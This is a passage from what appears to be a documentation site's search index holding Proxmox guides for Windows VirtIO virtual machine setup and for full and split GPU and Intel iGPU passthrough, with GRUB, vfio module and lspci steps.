Resize of Ceph disks is currently not supported (PR are welcome!) ", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/", "title": "Proxmox Windows Virtual Machine Configuration", "text": "This guide will walk you through configuring Windows 10 or Windows 11 Virtual Machines with VirtIO Disks and Networking using Proxmox. This configuration was tested to work with the GPU passthroughs
feature from one of the following guides:
GPU Passthrough to VM - Full GPU passthrough to VM guide iGPU Passthrough to VM - Cpu's GPU passthrough to VM guide (Intel) iGPU Split Passthrough - Splitting (CPU's GPU) to Multiple GPUs passthrough to VM guide ", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#prerequirements", "title": "Prerequirements", "text": "Before we begin, we need to download the VirtIO Drivers for Windows iso
. Upload it via the GUI as any other ISO file.
You can allso use ssh and download it directly from the Proxmox server.
wget -P /var/lib/vz/template/iso https://fedorapeople.org/groups/virt/virtio-win/direct-downloads/stable-virtio/virtio-win.iso\n
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#create-a-vm-in-proxmox", "title": "Create a VM in Proxmox", "text": "Create a Virutal Machine in Proxmox as usual.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#general", "title": "General", "text": "Select Advanced
options.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#os", "title": "OS", "text": "Choose the iso file image for Windows 10 or 11. Change Type
to Microsoft Windows
and Version
to your's windows version.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#system", "title": "System", "text": "Change the Machine type to q35
, BIOS to UEFI
. Add TPM for Windows 11. Alocate Storage for UEFI BIOS and TPM.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#disks", "title": "Disks", "text": "Set Bus/Device to VirtIO Block
and Cache to Write Through
. Select the storage disk and the VM's disk size.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#cpu", "title": "CPU", "text": "Choose how many cores you want to use. Set The cpu Type to Host
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#memory", "title": "Memory", "text": "Alocate the memory for the VM. Make sure the Ballooning Device
is enabled.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#network", "title": "Network", "text": "Select your preferred network interface. Set the Model to VirtIO (paravirtualized)
.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#confirm", "title": "Confirm", "text": "Don't Start the VM after creating it.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#add-cddvd-to-vm", "title": "Add CD/DVD to VM", "text": "We will need to use the VirtIO Drivers for Windows iso
file to install the drivers while installing the Windows VM.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#hardware-before-installation", "title": "Hardware Before Installation", "text": "This how the hardware of the VM should look like befor starting the Windows installation.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#windows-installation", "title": "Windows Installation", "text": "The Windows installation process is the same as any other Windows OS installation. The only caveat is that you need to install the drivers for the Storage devices and Network devices.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#choose-custom-install-windows-only-advanced", "title": "Choose Custom: Install Windows only (advanced)", "text": "", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#missing-storage-devices", "title": "Missing Storage Devices", "text": "When prompted to select the storage device to install windows the device won't show since we are using the VirtIO storage. Select Load Driver
.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#load-the-virtio-drivers", "title": "Load the VirtIO Drivers", "text": "Browse to the VirtIO Disk find a folder called viostor
and select the appropriate windows driver.
You should see the a Red Hat VirtIO driver selected. Click Next
and install the driver.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#continue-with-the-installation-as-usual", "title": "Continue with the installation as usual", "text": "", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#missing-network-driver", "title": "Missing Network Driver", "text": "Windows won't be able to load network drivers while installing. When prompted with something for connecting to the Internet, select I Don't have internet
and skip it. We will deal with the network drivers at post installation.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#post-installation", "title": "Post Installation", "text": "", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#install-all-the-virtio-drivers-for-windows", "title": "Install all the VirtIO Drivers for Windows", "text": "Open the VirtIO CD and run the virtio-win-gt-x64.exe
, virtio-win-guest-tools
installer. This will install all the missing virtio drivers for the VM and guest OS tools.
After the installtion your Device Manager should look like this without any errors.
", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/windows-vm-configuration/#remove-the-virtio-cddvd-and-windows-iso", "title": "Remove the VirtIO CD/DVD and Windows iso", "text": "Power off the VM.
Remove the added CD/DVD for VirtIO iso.
Select Do nor use any media
on the CD/DVD with the Windows iso.
At this point we are done with the installation of the Windows VM.
Follow those guides for utilizing a GPU passthrough to VM:
GPU Passthrough to VM - Full GPU passthrough to VM guide iGPU Passthrough to VM - Cpu's GPU passthrough to VM guide (Intel) [GPU Split Passthrough][gpu-split-passthrough] - Splitting (Nvidia) to Multiple GPUs passthrough to VM guide ", "tags": ["Proxmox", "Windows Virtual Machines", "VirtIO"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/", "title": "Proxmox GPU Passthrough to VM", "text": "", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#introduction", "title": "Introduction", "text": "GPU passthrough is a technology that allows the Linux kernel to present the internal PCI GPU directly to the virtual machine. The device behaves as if it were powered directly by the virtual machine, and the virtual machine detects the PCI device as if it were physically connected. We will cover how to enable GPU passthrough to a virtual machine in Proxmox VE.
Your mileage may vary depending on your hardware.
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#proxmox-configuration-for-gpu-passthrough", "title": "Proxmox Configuration for GPU Passthrough", "text": "The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Find the PCI address of the GPU Device. The following command will show the PCI address of the GPU devices in Proxmox server:
lspci -nnv | grep VGA\n
Find the GPU you want to passthrough in result ts should be similar to this:
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] [10de:1e81] (rev a1) (prog-if 00 [VGA controller])\n
What we are looking is the PCI address of the GPU device. In this case it's 01:00.0
. 01:00.0
is only a part of of a group of PCI devices on the GPU. We can list all the devices in the group 01:00
by using the following command:
lspci -s 01:00\n
The usual output will include VGA Device and Audio Device. In my case, we have a USB Controller and a Serial bus controller:
01:00.0 VGA compatible controller: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] (rev a1)\n01:00.1 Audio device: NVIDIA Corporation TU104 HD Audio Controller (rev a1)\n01:00.2 USB controller: NVIDIA Corporation TU104 USB 3.1 Host Controller (rev a1)\n01:00.3 Serial bus controller [0c80]: NVIDIA Corporation TU104 USB Type-C UCSI Controller (rev a1)\n
Now we need to get the id's of those devices. We can do this by using the following command:
lspci -s 01:00 -n\n
The output should look similar to this:
01:00.0 0300: 10de:1e81 (rev a1)\n01:00.1 0403: 10de:10f8 (rev a1)\n01:00.2 0c03: 10de:1ad8 (rev a1)\n01:00.3 0c80: 10de:1ad9 (rev a1)\n
What we are looking are the pairs, we will use those id to split the PCI Group to separate devices.
10de:1e81,10de:10f8,10de:1ad8,10de:1ad9\n
Now it's time to edit the grub
configuration file.
nano /etc/default/grub\n
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet\"\n
For Intel CPUFor AMD CPU intel_iommu=on\n
amd_iommu=on\n
Then change it to look like this (Intel CPU example) and replace vfio-pci.ids=
with the ids for the GPU you want to passthrough:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet intel_iommu=on pcie_acs_override=downstream,multifunction video=efifb:off video=vesa:off vfio-pci.ids=10de:1e81,10de:10f8,10de:1ad8,10de:1ad9 vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu\"\n
Save the config changed and then update GRUB.
update-grub\n
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
nano /etc/modules\n
Add the following line to the end of the file:
# Modules required for PCI passthrough\nvfio\nvfio_iommu_type1\nvfio_pci\nvfio_virqfd\n
Save and exit the editor.
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all\n
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU\n
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[0.000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA\n[0.067203] DMAR: IOMMU enabled\n[2.573920] pci 0000:00:00.2: AMD-Vi: IOMMU performance counters supported\n[2.580393] pci 0000:00:00.2: AMD-Vi: Found IOMMU cap 0x40\n[2.581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).\n
Check that the GPU is in a separate IOMMU Group by using the following command:
#!/bin/bash\nshopt -s nullglob\nfor g in $(find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V); do\necho \"IOMMU Group ${g##*/}:\"\nfor d in $g/devices/*; do\necho -e \"\\t$(lspci -nns ${d##*/})\"\ndone;\ndone;\n
Now your Proxmox host should be ready to GPU passthrough!
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#windows-virtual-machine-gpu-passthrough-configuration", "title": "Windows Virtual Machine GPU Passthrough Configuration", "text": "For better results its recommend to use this Windwos 10/11 Virutal Machine configuration for proxmox.
Limitations & Workarounds
In order for the GPU to to function properly in the VM, you must disable Proxmox's Virutal Display - Set it none
.
You will lose the ability to conect to the VM via Proxmox's Console.
Display must be conected to the physical output of the GPU for the Windows Host to initialize the GPU properly.
You can use a HDMI Dummy Plug as a workaround - It will present itself as a HDMI Display to the Windows Host.
Make sure you have alternative way to connect to the VM for example via Remote Desktop (RDP).
Find the PCI address of the GPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] [10de:1e81] (rev a1) (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the GPU is 01:00.0
.
For best performance the VM should be configured the Machine
type to q35. This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the GPU, which you can find using it\u2019s PCI address. This list uses a different format for the PCI addresses id, 01:00.0
is listed as 0000:01:00.0
.
Select All Functions
, ROM-Bar
, Primary GPU
, PCI-Express
and then click Add
.
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Connect to the VM via Remote Desktop (RDP) or any other remote access protocol you prefer. Install the latest version of GPU Driver for your GPU.
If all when well you should see the following output in Device Manager
and GPU-Z:
That's it!
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#linux-virtual-machine-gpu-passthrough-configuration", "title": "Linux Virtual Machine GPU Passthrough Configuration", "text": "We will be using Ubuntu Server 20.04 LTS. for this guide.
From Proxmox Terminal find the PCI address of the GPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] [10de:1e81] (rev a1) (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the GPU is 01:00.0
.
For best performance the VM should be configured the Machine
type to q35. This will allow the VM to utilize PCI-Express passthrough.
Open the Device
dropdown and select the GPU, which you can find using it\u2019s PCI address. This list uses a different format for the PCI addresses id, 01:00.0
is listed as 0000:01:00.0
.
Select All Functions
, ROM-Bar
, PCI-Epress
and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the GPU passthrough was successful, you can use the following command in the VM:
sudo lspci -nnv | grep VGA\n
The output should incliude the GPU:
01:00.0 VGA compatible controller [0300]: NVIDIA Corporation TU104 [GeForce RTX 2080 SUPER] [10de:1e81] (rev a1) (prog-if 00 [VGA controller])\n
Now we need to install the GPU Driver. I'll be covering the installation of Nvidia Drivers in the next example.
Search for the latest Nvidia Driver for your GPU.
sudo apt search nvidia-driver\n
In the next step we will install the Nvidia Driver v535.
Note
--no-install-recommends is important for Headless Server. nvidia-driver-535
will install xorg (GUI) --no-install-recommends
flag will prevent the GUI from being installed.
sudo apt install --no-install-recommends -y build-essential nvidia-driver-535 nvidia-headless-535 nvidia-utils-535 nvidia-cuda-toolkit\n
This will take a while to install. After the installation is complete, you should reboot the VM.
Now let's test the Driver initalization. Run the following command in the VM:
nvidia-smi && nvidia-smi -L\n
If all went well you should see the following output:
That's it! You should now be able to use the GPU for hardware acceleration inside the VM.
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/#debug", "title": "Debug", "text": "Dbug Messages - Shows Hardware initialization and errors
dmesg -w\n
Display PCI devices information
lspci\n
Display Driver in use for PCI devices
lspci -k\n
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash\nshopt -s nullglob\nfor g in $(find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V); do\necho \"IOMMU Group ${g##*/}:\"\nfor d in $g/devices/*; do\necho -e \"\\t$(lspci -nns ${d##*/})\"\ndone;\ndone;\n
Reboot Proxmox to apply the changes
", "tags": ["proxmox", "gpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/", "title": "iGPU Passthrough to VM (Intel Integrated Graphics)", "text": "", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#introduction", "title": "Introduction", "text": "Intel Integrated Graphics (iGPU) is a GPU that is integrated into the CPU. The GPU is a part of the CPU and is used to render graphics. Proxmox may be configured to use iGPU passthrough to VM to allow the VM to use the iGPU for hardware acceleration for example using video encoding/decoding and Transcoding for series like Plex and Emby. This guide will show you how to configure Proxmox to use iGPU passthrough to VM.
Your mileage may vary depending on your hardware. The following guide was tested with Intel Gen8 CPU.
There are two ways to use iGPU passthrough to VM. The first way is to use the Full iGPU Passthrough
to VM. The second way is to use the iGPU GVT-g
technology which allows as to split the iGPU into two parts. We will be covering the Full iGPU Passthrough
. If you want to use the split iGPU GVT-g Passthrough
you can find the guide here.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#proxmox-configuration-for-igpu-full-passthrough", "title": "Proxmox Configuration for iGPU Full Passthrough", "text": "The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Edit the grub
configuration file.
nano /etc/default/grub\n
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet\"\n
We want to allow passthrough
and Blacklists
known graphics drivers to prevent proxmox from utilizing the iGPU.
Warning
You will loose the ability to use the onboard graphics card to access the Proxmox's console since Proxmox won't be able to use the Intel's gpu
Your GRUB_CMDLINE_LINUX_DEFAULT
should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet intel_iommu=on iommu=pt pcie_acs_override=downstream,multifunction initcall_blacklist=sysfb_init video=simplefb:off video=vesafb:off video=efifb:off video=vesa:off disable_vga=1 vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu,snd_hda_intel,snd_hda_codec_hdmi,i915\"\n
Note
This will blacklist most of the graphics drivers from proxmox. If you have a specific driver you need to use for Proxmox Host you need to remove it from modprobe.blacklist
Save and exit the editor.
Update the grub configuration to apply the changes the next time the system boots.
update-grub\n
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
nano /etc/modules\n
Add the following line to the end of the file:
# Modules required for PCI passthrough\nvfio\nvfio_iommu_type1\nvfio_pci\nvfio_virqfd\n
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all\n
Save and exit the editor.
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU\n
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[0.000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA\n[0.067203] DMAR: IOMMU enabled\n[2.573920] pci 0000:00:00.2: AMD-Vi: IOMMU performance counters supported\n[2.580393] pci 0000:00:00.2: AMD-Vi: Found IOMMU cap 0x40\n[2.581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).\n
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#windows-virtual-machine-igpu-passthrough-configuration", "title": "Windows Virtual Machine iGPU Passthrough Configuration", "text": "For better results its recommend to use this Windows 10/11 Virtual Machine configuration for proxmox.
Find the PCI address of the iGPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-S GT2 [UHD Graphics 630] [8086:3e92] (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the iGPU is 00:02.0
.
For best performance the VM should be configured the Machine
type to q35. This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using it\u2019s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Select All Functions
, ROM-Bar
, PCI-Express
and then click Add
.
Tip
I've found that the most consistent way to utilize the GPU acceleration is to disable Proxmox's Virtual Graphics card of the vm. The drawback of disabling the Virtual Graphics card is that it will not be able to access the vm via proxmox's vnc console. The workaround is to enable Remote Desktop (RDP) on the VM before disabling the Virtual Graphics card and accessing the VM via RDP or use any other remove desktop client. If you loose the ability to access the VM via RDP you can temporarily remove the GPU PCI Device and re-enable the virtual graphics card
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Connect to the VM via Remote Desktop (RDP) or any other remote access protocol you prefer. Install the latest version of Intel's Graphics Driver or use the Intel Driver & Support Assistant installer.
If all when well you should see the following output in Device Manager
and GPU-Z:
That's it!
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#linux-virtual-machine-igpu-passthrough-configuration", "title": "Linux Virtual Machine iGPU Passthrough Configuration", "text": "We will be using Ubuntu Server 20.04 LTS for this guide.
From Proxmox Terminal find the PCI address of the iGPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-S GT2 [UHD Graphics 630] [8086:3e92] (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name. Here, the PCI address of the iGPU is 00:02.0
.
Open the Device
dropdown and select the iGPU, which you can find using it\u2019s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Select All Functions
, ROM-Bar
and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the iGPU passthrough was successful, you can use the following command:
sudo lspci -nnv | grep VGA\n
The output should include the Intel iGPU:
00:10.0 VGA compatible controller [0300]: Intel Corporation UHD Graphics 630 (Desktop) [8086:3e92] (prog-if 00 [VGA controller])\n
Now we need to check if the GPU's Driver initalization is working.
cd /dev/dri && ls -la\n
The output should include the renderD128
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-passthrough-to-vm/#debug", "title": "Debug", "text": "Dbug Messages - Shows Hardware initialization and errors
dmesg -w\n
Display PCI devices information
lspci\n
Display Driver in use for PCI devices
lspci -k\n
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash\nshopt -s nullglob\nfor g in $(find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V); do\necho \"IOMMU Group ${g##*/}:\"\nfor d in $g/devices/*; do\necho -e \"\\t$(lspci -nns ${d##*/})\"\ndone;\ndone;\n
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/", "title": "iGPU Split Passthrough (Intel Integrated Graphics)", "text": "", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#introduction", "title": "Introduction", "text": "Intel Integrated Graphics (iGPU) is a GPU that is integrated into the CPU. The GPU is a part of the CPU and is used to render graphics. Proxmox may be configured to use iGPU split passthrough to VM to allow the VM to use the iGPU for hardware acceleration for example using video encoding/decoding and Transcoding for series like Plex and Emby. This guide will show you how to configure Proxmox to use iGPU passthrough to VM.
Your mileage may vary depending on your hardware. The following guide was tested with Intel Gen8 CPU.
Supported CPUs
iGPU GVT-g Split Passthrough
is supported only on Intel's 5th generation to 10th generation CPUs!
Known supported CPU families:
Broadwell
Skylake
Kaby Lake
Coffee Lake
Comet Lake
There are two ways to use iGPU passthrough to VM. The first way is to use the Full iGPU Passthrough
to VM. The second way is to use the iGPU GVT-g
technology which allows as to split the iGPU into two parts. We will be covering the Split iGPU Passthrough
. If you want to use the split Full iGPU Passthrough
you can find the guide here.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#proxmox-configuration-for-gvt-g-split-passthrough", "title": "Proxmox Configuration for GVT-g Split Passthrough", "text": "The following examples uses SSH
connection to the Proxmox server. The editor is nano
but feel free to use any other editor. We will be editing the grub
configuration file.
Edit the grub
configuration file.
nano /etc/default/grub\n
Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT
by default they should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet\"\n
We want to allow passthrough
and Blacklists
known graphics drivers to prevent proxmox from utilizing the iGPU.
Your GRUB_CMDLINE_LINUX_DEFAULT
should look like this:
GRUB_CMDLINE_LINUX_DEFAULT=\"quiet intel_iommu=on i915.enable_gvt=1 iommu=pt pcie_acs_override=downstream,multifunction video=efifb:off video=vesa:off vfio_iommu_type1.allow_unsafe_interrupts=1 kvm.ignore_msrs=1 modprobe.blacklist=radeon,nouveau,nvidia,nvidiafb,nvidia-gpu\"\n
Note
This will blacklist most of the graphics drivers from proxmox. If you have a specific driver you need to use for Proxmox Host you need to remove it from modprobe.blacklist
Save and exit the editor.
Update the grub configuration to apply the changes the next time the system boots.
update-grub\n
Next we need to add vfio
modules to allow PCI passthrough.
Edit the /etc/modules
file.
nano /etc/modules\n
Add the following line to the end of the file:
# Modules required for PCI passthrough\nvfio\nvfio_iommu_type1\nvfio_pci\nvfio_virqfd\n\n# Modules required for Intel GVT-g Split\nkvmgt\n
Save and exit the editor.
Update configuration changes made in your /etc filesystem
update-initramfs -u -k all\n
Reboot Proxmox to apply the changes
Verify that IOMMU is enabled
dmesg | grep -e DMAR -e IOMMU\n
There should be a line that looks like DMAR: IOMMU enabled
. If there is no output, something is wrong.
[0.000000] Warning: PCIe ACS overrides enabled; This may allow non-IOMMU protected peer-to-peer DMA\n[0.067203] DMAR: IOMMU enabled\n[2.573920] pci 0000:00:00.2: AMD-Vi: IOMMU performance counters supported\n[2.580393] pci 0000:00:00.2: AMD-Vi: Found IOMMU cap 0x40\n[2.581776] perf/amd_iommu: Detected AMD IOMMU #0 (2 banks, 4 counters/bank).\n
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#windows-virtual-machine-igpu-passthrough-configuration", "title": "Windows Virtual Machine iGPU Passthrough Configuration", "text": "For better results its recommend to use this Windwos 10/11 Virutal Machine configuration for proxmox.
Find the PCI address of the iGPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-S GT2 [UHD Graphics 630] [8086:3e92] (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name.
Here, the PCI address of the iGPU is 00:02.0
.
For best performance the VM should be configured the Machine
type to q35. This will allow the VM to utilize PCI-Express passthrough.
Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using it\u2019s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Click Mdev Type
, You should be presented with a list of the available split passthrough devices choose the better performing one for the vm.
Select ROM-Bar
, PCI-Express
and then click Add
.
The Windows Virtual Machine Proxmox Setting should look like this:
Power on the Windows Virtual Machine.
Open the VM's Console. Install the latest version of Intel's Graphics Driver or use the Intel Driver & Support Assistant installer.
If all when well you should see the following output in Device Manager
and GPU-Z:
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#linux-virtual-machine-igpu-passthrough-configuration", "title": "Linux Virtual Machine iGPU Passthrough Configuration", "text": "We will be using Ubuntu Server 20.04 LTS for this guide.
From Proxmox Terminal find the PCI address of the iGPU.
lspci -nnv | grep VGA\n
This should result in output similar to this:
00:02.0 VGA compatible controller [0300]: Intel Corporation CometLake-S GT2 [UHD Graphics 630] [8086:3e92] (prog-if 00 [VGA controller])\n
If you have multiple VGA, look for the one that has the Intel
in the name.
Here, the PCI address of the iGPU is 00:02.0
.
VM should be configured the Machine
type to i440fx. Open the web gui and navigate to the Hardware
tab of the VM you want to add a vGPU to. Click Add
above the device list and then choose PCI Device
Open the Device
dropdown and select the iGPU, which you can find using it\u2019s PCI address. This list uses a different format for the PCI addresses id, 00:02.0
is listed as 0000:00:02.0
.
Click Mdev Type
, You should be presented with a list of the available split passthrough devices choose the better performing one for the vm.
Select ROM-Bar
, and then click Add
.
The Ubuntu Virtual Machine Proxmox Setting should look like this:
Boot the VM. To test the iGPU passthrough was successful, you can use the following command:
sudo lspci -nnv | grep VGA\n
The output should incliude the Intel iGPU:
00:10.0 VGA compatible controller [0300]: Intel Corporation UHD Graphics 630 (Desktop) [8086:3e92] (prog-if 00 [VGA controller])\n
Now we need to check if the GPU's Driver initalization is working.
cd /dev/dri && ls -la\n
The output should incliude the renderD128
That's it! You should now be able to use the iGPU for hardware acceleration inside the VM and still have proxmox's output on the screen.
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/igpu-split-passthrough/#debug", "title": "Debug", "text": "Dbug Messages - Shows Hardware initialization and errors
dmesg -w\n
Display PCI devices information
lspci\n
Display Driver in use for PCI devices
lspci -k\n
Display IOMMU Groups the PCI devices are assigned to
#!/bin/bash\nshopt -s nullglob\nfor g in $(find /sys/kernel/iommu_groups/* -maxdepth 0 -type d | sort -V); do\necho \"IOMMU Group ${g##*/}:\"\nfor d in $g/devices/*; do\necho -e \"\\t$(lspci -nns ${d##*/})\"\ndone;\ndone;\n
", "tags": ["proxmox", "igpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/", "title": "vGPU Split Passthrough (Nvidia)", "text": "", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#credit-and-thanks", "title": "Credit and Thanks", "text": "Thanks to @polloloco for creating and maintaining this guide.
Official GitLab repository: polloloco/vgpu-proxmox
", "tags": ["proxmox", "vgpu", "passthrough"]}, {"location": "infrastructure/proxmox/gpu-passthrough/vgpu-split-passthrough/#nvidia-vgpu-with-the-grid", "title": "NVIDIA vGPU with the GRID", "text": "This document serves as a guide to install NVIDIA vGPU host drivers on the latest Proxmox VE version, at time of writing this its pve 8.0.
